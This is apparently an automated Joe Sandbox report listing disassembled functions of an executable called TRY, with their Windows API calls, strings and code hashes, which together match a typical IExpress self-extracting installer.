API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
String ID: rce.$tha
API String ID: 2929476258-4244134132
Opcode ID: 8031d0f5c260d1828ae3b026181698a0ded8a6d20b8c433cb7d87d6f329fc285
Instruction ID: a6532b99f6dbed088408c4e3e97dad4109bebe8de07bf15f2fab1a88fe93cb16
Opcode Fuzzy Hash: 8031d0f5c260d1828ae3b026181698a0ded8a6d20b8c433cb7d87d6f329fc285
Instruction Fuzzy Hash: 9251C071E0D78686FB118B2DA9183B926B0AF58BA4F1402B1DF4E837D5DF3CE5828304

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC42448 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120registryCOMMON

Download Yara Rule

APIs

CharUpperA.USER32 ref: 00007FF6BAC4248E
CharNextA.USER32 ref: 00007FF6BAC4249A
CharNextA.USER32 ref: 00007FF6BAC424A3
RegOpenKeyExA.ADVAPI32 ref: 00007FF6BAC4253E
RegQueryValueExA.ADVAPI32 ref: 00007FF6BAC4256F
ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF6BAC42590
RegCloseKey.ADVAPI32 ref: 00007FF6BAC425C1
GetWindowsDirectoryA.KERNEL32 ref: 00007FF6BAC425D1
GetSystemDirectoryA.KERNEL32 ref: 00007FF6BAC425E1

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00007FF6BAC424C0

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 1314adf55e8c5aadfa89ec9868a05f6851897013704a9f684ecd2a0776fb0ae0
Instruction ID: 43319bdba8fb22ee61933423afc0e6ef0868e5dff743daa6122edf813b3191ef
Opcode Fuzzy Hash: 1314adf55e8c5aadfa89ec9868a05f6851897013704a9f684ecd2a0776fb0ae0
Instruction Fuzzy Hash: 1B419272B1869286EB108F19E8992AE67B0FB85B80F545071EF8E83B94DF3CD545C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC432B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6BAC432F0
GetDesktopWindow.USER32 ref: 00007FF6BAC432F8
SetDlgItemTextA.USER32 ref: 00007FF6BAC43318
SetWindowTextA.USER32 ref: 00007FF6BAC43328
SetForegroundWindow.USER32 ref: 00007FF6BAC43331
GetDlgItem.USER32 ref: 00007FF6BAC4333F
GetWindowLongPtrA.USER32 ref: 00007FF6BAC43350
SetWindowLongPtrA.USER32 ref: 00007FF6BAC4336C
SendDlgItemMessageA.USER32 ref: 00007FF6BAC43397

Strings

tha, xrefs: 00007FF6BAC4331E

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: tha
API String ID: 3785188418-992520703
Opcode ID: 27b069c42d7cb845fa97ce8d939dda9c2cba10eeb794f59d18c4f9ea67e0c096
Instruction ID: b896ef3185c5658684b28a5ed0642de1c9613ac4027df296f02878c681304f62
Opcode Fuzzy Hash: 27b069c42d7cb845fa97ce8d939dda9c2cba10eeb794f59d18c4f9ea67e0c096
Instruction Fuzzy Hash: 57213064E0865382FA649B6DE84C3782371AF85B64F5493B0CE2EC63E5DF3CA449C348

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC476D8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF6BAC4772D
GetSystemMetrics.USER32 ref: 00007FF6BAC47761
RegOpenKeyExA.ADVAPI32 ref: 00007FF6BAC47790
RegQueryValueExA.ADVAPI32 ref: 00007FF6BAC477C5
RegCloseKey.ADVAPI32 ref: 00007FF6BAC477D2
CharNextA.USER32 ref: 00007FF6BAC4781B

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00007FF6BAC47782

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 0ef2e49ea2d523cb0d96e1510a882bc26b5037e292a8015958692e0b2fe72ee1
Instruction ID: 04550e8da80d87d04bbbcc1acf83b8934cf644df35c9909c50b055448293555b
Opcode Fuzzy Hash: 0ef2e49ea2d523cb0d96e1510a882bc26b5037e292a8015958692e0b2fe72ee1
Instruction Fuzzy Hash: 4C41B032E0969286EB208B28E8886BD73B5FB84B50F6441B2DF5D93794DF7CE544CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC411C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF6BAC411FD
GetProcAddress.KERNEL32 ref: 00007FF6BAC41219
AllocateAndInitializeSid.ADVAPI32 ref: 00007FF6BAC41260
FreeSid.ADVAPI32 ref: 00007FF6BAC41282
FreeLibrary.KERNEL32 ref: 00007FF6BAC4128B

Strings

CheckTokenMembership, xrefs: 00007FF6BAC4120F
advapi32.dll, xrefs: 00007FF6BAC411F0

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 64d96d54a73524583d87b63dfc7e8286ae492dfacb74392b1afb45792a249c94
Instruction ID: 9782d7d910df3d227d007bec51e69af1078400d040d7ed932d7b25ab6a239b73
Opcode Fuzzy Hash: 64d96d54a73524583d87b63dfc7e8286ae492dfacb74392b1afb45792a249c94
Instruction Fuzzy Hash: 03210A36A08B4586E7608F1AF4481AAB7B0FB88B90F44117AEF8D83714DF3CE545CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC42628 Relevance: 12.1, APIs: 8, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32 ref: 00007FF6BAC4280E

Part of subcall function 00007FF6BAC42448: CharUpperA.USER32 ref: 00007FF6BAC4248E
Part of subcall function 00007FF6BAC42448: CharNextA.USER32 ref: 00007FF6BAC4249A
Part of subcall function 00007FF6BAC42448: CharNextA.USER32 ref: 00007FF6BAC424A3
Part of subcall function 00007FF6BAC42448: RegOpenKeyExA.ADVAPI32 ref: 00007FF6BAC4253E
Part of subcall function 00007FF6BAC42448: RegQueryValueExA.ADVAPI32 ref: 00007FF6BAC4256F
Part of subcall function 00007FF6BAC42448: ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF6BAC42590
Part of subcall function 00007FF6BAC42448: RegCloseKey.ADVAPI32 ref: 00007FF6BAC425C1

GetFileVersionInfoSizeA.VERSION ref: 00007FF6BAC426A0
GlobalAlloc.KERNEL32 ref: 00007FF6BAC426B7
GlobalLock.KERNEL32 ref: 00007FF6BAC426CC
GetFileVersionInfoA.VERSION ref: 00007FF6BAC426EE
VerQueryValueA.VERSION ref: 00007FF6BAC4270E
GlobalUnlock.KERNEL32 ref: 00007FF6BAC427B2
GlobalUnlock.KERNEL32 ref: 00007FF6BAC427C0

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
String ID:
API String ID: 1051330783-0
Opcode ID: f78638de83485bf910632d144a3a72b8691c3b3d70d5a8fe4b5d167855251055
Instruction ID: e5d99a985764ea59545d6181479ae1567f94b281b86cf075d81aa501e8f44159
Opcode Fuzzy Hash: f78638de83485bf910632d144a3a72b8691c3b3d70d5a8fe4b5d167855251055
Instruction Fuzzy Hash: E2514E72B08652CAEA208F29D9496B837B5FB44B98F144171DF09E3694EF3CE8918708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC42830 Relevance: 12.1, APIs: 8, Instructions: 118COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF6BAC42876
IsDBCSLeadByte.KERNEL32 ref: 00007FF6BAC4288C
CharNextA.USER32 ref: 00007FF6BAC428AC
CharUpperA.USER32 ref: 00007FF6BAC428B9
CharPrevA.USER32 ref: 00007FF6BAC428EB
CharUpperA.USER32 ref: 00007FF6BAC42941
CharNextA.USER32 ref: 00007FF6BAC42995
CharNextA.USER32 ref: 00007FF6BAC429A1

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
String ID:
API String ID: 975904313-0
Opcode ID: e1d04261d858ece4703b4c937cc3562b4ed0abf51833e14a07d3450d64b04fd3
Instruction ID: c37402363b00636206a7d4b1153c0959cc3b32dafdf0c5e13bce75eac7a09061
Opcode Fuzzy Hash: e1d04261d858ece4703b4c937cc3562b4ed0abf51833e14a07d3450d64b04fd3
Instruction Fuzzy Hash: 1B41C351E0C6D641FF224F29A4593BD6BB1AF59BA0F4841B1CF9E86785CF2CE446C318

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC43D0C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 70memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44CE8
Part of subcall function 00007FF6BAC44CC0: SizeofResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44CF3
Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44D13
Part of subcall function 00007FF6BAC44CC0: LoadResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D1E
Part of subcall function 00007FF6BAC44CC0: LockResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D27
Part of subcall function 00007FF6BAC44CC0: memcpy_s.MSVCRT ref: 00007FF6BAC44D40
Part of subcall function 00007FF6BAC44CC0: FreeResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D49

LocalAlloc.KERNEL32(?,?,?,?,?,00007FF6BAC42E75), ref: 00007FF6BAC43D2D
GetLastError.KERNEL32 ref: 00007FF6BAC43D5D
LocalFree.KERNEL32 ref: 00007FF6BAC43DB9

Part of subcall function 00007FF6BAC44A70: LoadStringA.USER32 ref: 00007FF6BAC44B04
Part of subcall function 00007FF6BAC44A70: MessageBoxA.USER32 ref: 00007FF6BAC44B3E

lstrcmpA.KERNEL32(?,?,?,?,?,00007FF6BAC42E75), ref: 00007FF6BAC43DD9
LocalFree.KERNEL32(?,?,?,?,?,00007FF6BAC42E75), ref: 00007FF6BAC43E2E

Part of subcall function 00007FF6BAC47304: FindResourceA.KERNEL32 ref: 00007FF6BAC4732E
Part of subcall function 00007FF6BAC47304: LoadResource.KERNEL32 ref: 00007FF6BAC4733F
Part of subcall function 00007FF6BAC47304: DialogBoxIndirectParamA.USER32 ref: 00007FF6BAC4736F
Part of subcall function 00007FF6BAC47304: FreeResource.KERNEL32 ref: 00007FF6BAC4737B

LocalFree.KERNEL32 ref: 00007FF6BAC43E0D

Strings

LICENSE, xrefs: 00007FF6BAC43D15, 00007FF6BAC43D81
<None>, xrefs: 00007FF6BAC43DD2

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 5a4247ff5b5a3f3e33d9449045396edb7047108b95579c67965ad8371a5c0a11
Instruction ID: 86c0e4af27deee1d25513a0137aa9b19c8eb494a9f3aefcc415bd634050c857b
Opcode Fuzzy Hash: 5a4247ff5b5a3f3e33d9449045396edb7047108b95579c67965ad8371a5c0a11
Instruction Fuzzy Hash: AB312E71E2D61283FB21AF29E89D77A26B0AF84745F1041B5DF4DC66A1DF7CE4048608

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC44938 Relevance: 10.6, APIs: 7, Instructions: 93COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00007FF6BAC4496B
GetWindowRect.USER32 ref: 00007FF6BAC44986
GetDC.USER32 ref: 00007FF6BAC4499D
GetDeviceCaps.GDI32 ref: 00007FF6BAC449AE
GetDeviceCaps.GDI32 ref: 00007FF6BAC449BF
ReleaseDC.USER32 ref: 00007FF6BAC449D2
SetWindowPos.USER32 ref: 00007FF6BAC44A3E

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 82eea2d133a119930696c2a32b8ef5d8a93a9560684ae113d9f716f9eb066404
Instruction ID: 3c29806e068ce4c533fbfb528271fb68ce9b59c0628fc845267e88ac55764b5e
Opcode Fuzzy Hash: 82eea2d133a119930696c2a32b8ef5d8a93a9560684ae113d9f716f9eb066404
Instruction Fuzzy Hash: 0631AF36B246118AF7108F79E958AAD3B71BB48B99F645171CF09A3B48CF3DE4858B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC46FB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BAC41144: _vsnprintf.MSVCRT ref: 00007FF6BAC41181

LoadResource.KERNEL32 ref: 00007FF6BAC46FE7
LockResource.KERNEL32 ref: 00007FF6BAC46FF0
FreeResource.KERNEL32 ref: 00007FF6BAC4702C
FindResourceA.KERNEL32 ref: 00007FF6BAC4705A
FreeResource.KERNEL32 ref: 00007FF6BAC4706D

Strings

UPDFILE%lu, xrefs: 00007FF6BAC47037

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 47e30c68af17bc8e8918541752d0bccbb5525b077b522209f1120021165a2946
Instruction ID: f86ae76450e5f8718bc9112b48567a3b5a48f6d1fbbb91526507b115e7d7f784
Opcode Fuzzy Hash: 47e30c68af17bc8e8918541752d0bccbb5525b077b522209f1120021165a2946
Instruction Fuzzy Hash: 0E21B232A08B4282FB108B2DE4486AA67B0EF84B94F654276DF5D837E5CF3CE441C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC420C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32 ref: 00007FF6BAC420ED
WritePrivateProfileStringA.KERNEL32 ref: 00007FF6BAC42116
_lopen.KERNEL32 ref: 00007FF6BAC42124
_llseek.KERNEL32 ref: 00007FF6BAC42139
_lclose.KERNEL32 ref: 00007FF6BAC42143

Strings

wininit.ini, xrefs: 00007FF6BAC420F7

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: d99a2e7cceb70ccd9de0c5f7326f226540c4efd172db76e164313395207c738a
Instruction ID: 2a6ad0cf6c53ce0f00799e605fbc9aa81725c9085b54b43c53a1a3929ca71630
Opcode Fuzzy Hash: d99a2e7cceb70ccd9de0c5f7326f226540c4efd172db76e164313395207c738a
Instruction Fuzzy Hash: A0112E32B1865282EB249B39E8993AA72B1FB88714F544171DF4EC36A4DF3CD549C604

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC43680 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00007FF6BAC436C3
SetWindowTextA.USER32 ref: 00007FF6BAC436DE
SetDlgItemTextA.USER32 ref: 00007FF6BAC436F3
SetForegroundWindow.USER32 ref: 00007FF6BAC436FC
EndDialog.USER32 ref: 00007FF6BAC43709

Strings

tha, xrefs: 00007FF6BAC436D4

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Window$Text$DesktopDialogForegroundItem
String ID: tha
API String ID: 761066910-992520703
Opcode ID: 7b0a0afc9afeab9cd489da0c529037e52088d876d79330b77116ab0ab807e242
Instruction ID: 27ea48c0d4d42ae95f5efcd06a32cb488ac09707876da68da5a3882bc5aa68cd
Opcode Fuzzy Hash: 7b0a0afc9afeab9cd489da0c529037e52088d876d79330b77116ab0ab807e242
Instruction Fuzzy Hash: 0F012CA4E1860386FE656B6DA94C2BC1671AF85B40F6491B0CE4EC63E5DF6CA484C608

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC4466C Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44CE8
Part of subcall function 00007FF6BAC44CC0: SizeofResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44CF3
Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44D13
Part of subcall function 00007FF6BAC44CC0: LoadResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D1E
Part of subcall function 00007FF6BAC44CC0: LockResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D27
Part of subcall function 00007FF6BAC44CC0: memcpy_s.MSVCRT ref: 00007FF6BAC44D40
Part of subcall function 00007FF6BAC44CC0: FreeResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D49

LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6BAC430B1), ref: 00007FF6BAC44695
LocalFree.KERNEL32(?,?,?,?,00000000,00007FF6BAC430B1), ref: 00007FF6BAC44725

Part of subcall function 00007FF6BAC44A70: LoadStringA.USER32 ref: 00007FF6BAC44B04
Part of subcall function 00007FF6BAC44A70: MessageBoxA.USER32 ref: 00007FF6BAC44B3E

Strings

FINISHMSG, xrefs: 00007FF6BAC44679, 00007FF6BAC446C6
@, xrefs: 00007FF6BAC4470B
<None>, xrefs: 00007FF6BAC446EF

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$@$FINISHMSG
API String ID: 3507850446-4126004490
Opcode ID: b487ec9568ec1de5c4182c7751c6796abb55c886bfc8e6d40acc34d304059198
Instruction ID: 41b13055b9da50821dba10603ee0bdfd5840b2353d1ca401cabfa3b3bd3ccd7c
Opcode Fuzzy Hash: b487ec9568ec1de5c4182c7751c6796abb55c886bfc8e6d40acc34d304059198
Instruction Fuzzy Hash: 1111BE76A1C31283FB209B2CF5697BA62B0EB85384F244175DF4E86B94DF3CD4408B08

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC4723C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF6BAC472B4
LoadLibraryExA.KERNEL32 ref: 00007FF6BAC472CE
LoadLibraryA.KERNEL32 ref: 00007FF6BAC472DD

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6BAC4725A
advpack.dll, xrefs: 00007FF6BAC47297, 00007FF6BAC472D6

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
API String ID: 438848745-2381869747
Opcode ID: d850ea1876ae98528329335e98d4342bb1a9607e9ecab4850cbfd1fe1fe41d5b
Instruction ID: 0b8f7f5fd9d42066966982e7c13a08d01fadd5f1ef1a30457d027e49d0ca2522
Opcode Fuzzy Hash: d850ea1876ae98528329335e98d4342bb1a9607e9ecab4850cbfd1fe1fe41d5b
Instruction Fuzzy Hash: DE112E31A18686D5FE719B18E4583FD73B0FB95704F9405B2DB9D82AA1DF2CE609C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC41490 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6BAC414D5
GetDesktopWindow.USER32 ref: 00007FF6BAC414E1
LoadStringA.USER32 ref: 00007FF6BAC4150B
SetDlgItemTextA.USER32 ref: 00007FF6BAC4151E
MessageBeep.USER32 ref: 00007FF6BAC41527

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

